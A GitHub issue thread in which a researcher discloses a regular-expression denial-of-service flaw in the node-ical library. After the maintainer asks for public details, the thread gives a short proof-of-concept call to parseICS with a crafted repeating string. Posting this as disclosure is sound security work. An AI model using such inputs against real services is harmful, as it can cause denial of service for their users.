-
-
Notifications
You must be signed in to change notification settings - Fork 53
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
ReDoS in node-ical #153
Comments
Please make this security report public on huntr rather than keeping it private. |
Sorry, I don't have permission to make this security report public on huntr. Only after this report is confirmed can it be made public. You can use your GitHub account to log in and access. |
What‘s wrong in posting this information here directly on GitHub? |
Others suggested that I should do a responsible disclosure, that is, I should not open an issue until the report has been validated. Once the report is made public, but not repaired in time, it may pose a certain risk. |
No problem here with that. node-ical is no missing critical application and I am not a security nerd either. Simply post it and I will see that I will try to review it ASAP. |
Thank you for your understanding! Proof of Concept var nodeIcal = require("node-ical")
var str= "!!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!;!==!!";
nodeIcal.parseICS(str); |
A relatively simple patch, you can use the package |
Hey Jens,
Recently I found a potential ReDoS vulnerability inside
node-ical
and provided some proper examples. You can access the vulnerability details at huntr. Please feel free to get in touch if there are any more issues.Best regards,
Yeting
The text was updated successfully, but these errors were encountered: